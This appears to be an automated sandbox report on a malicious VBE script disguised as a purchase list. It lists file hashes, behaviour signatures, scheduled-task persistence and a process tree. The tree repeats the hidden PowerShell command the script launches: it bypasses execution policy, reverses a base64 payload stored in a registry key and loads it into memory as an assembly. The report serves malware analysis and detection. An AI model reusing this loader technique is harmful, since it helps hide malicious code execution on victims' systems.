Analysis

  • max time kernel
    145s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    28/02/2025, 11:05

General

  • Target

    purchase list #8479734734-8843947347_____________________________.vbe

  • Size

    24KB

  • MD5

    5aea1615d1872e876da66200bc9e47fa

  • SHA1

    6fe3576517885705735762ff060e9068fd9fdbe9

  • SHA256

    c9a42d3cb9f1ff79d28112275dd9d598daa429c81912c171401fce5594f1f515

  • SHA512

    68a87c1bbbf107714634af224b46a02252c8fd7e3799dee8fa36e4e064be07f2e51e4fab20591d7e6e05de769a4aac7ae59ef3b70e95cd3b6cec77d028a05ccd

  • SSDEEP

    192:Lh1qAagTqDNmlc1sN+uc4f9caUxarPlP1K:qMqDAlnoP4VcaUxarK

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\purchase list #8479734734-8843947347_____________________________.vbe"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:796
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2768
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {5A9CC2EA-E027-486C-865E-305388A658F0} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\NforSjIryOoBaoP.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1660
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2728
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1196
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2032
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2128
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2504
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1520
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2256
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1356
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2932

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    f0a3b6b37e95e1aa1a5bab7fc993d6c8

    SHA1

    f7b170c1da17d0575ceb5cc4e4347de2eb883c19

    SHA256

    4b3f3dfb60155db9c08bede4cbaeb91721a4a7c965289fe165855c894c5e79e5

    SHA512

    8d04d5fed95b0fa5907a8ee77cebc30f832f7f25417eeab0d6d7c710a905b7098890a76759baa94b026cf3c945b1820ef0e970791ef8f54075bc92355c9239c3

  • C:\Users\Admin\AppData\Roaming\NforSjIryOoBaoP.vbs

    Filesize

    2KB

    MD5

    361b0dd2b7993fe7d36caa709dfa9438

    SHA1

    ffd8de4adc4f2850d5b0ae4af21dd2fbd0a75d8d

    SHA256

    ce725c50b0c8b66e12fc51e3673869d069160278a05ac5c4e8c2d278551cf78f

    SHA512

    70537e86d38b45782c6db967bc963c2f09c1fec2c217f58dec21b3e4ea18f1fbf35ed5519a0f3eaf82d87f69ce5bc2c901361fae297d1c0a6bb7ca161d0355a3

  • memory/2768-6-0x000000001B220000-0x000000001B502000-memory.dmp

    Filesize

    2.9MB

  • memory/2768-7-0x00000000025D0000-0x00000000025D8000-memory.dmp

    Filesize

    32KB

  • memory/2768-8-0x000000001B680000-0x000000001B68A000-memory.dmp

    Filesize

    40KB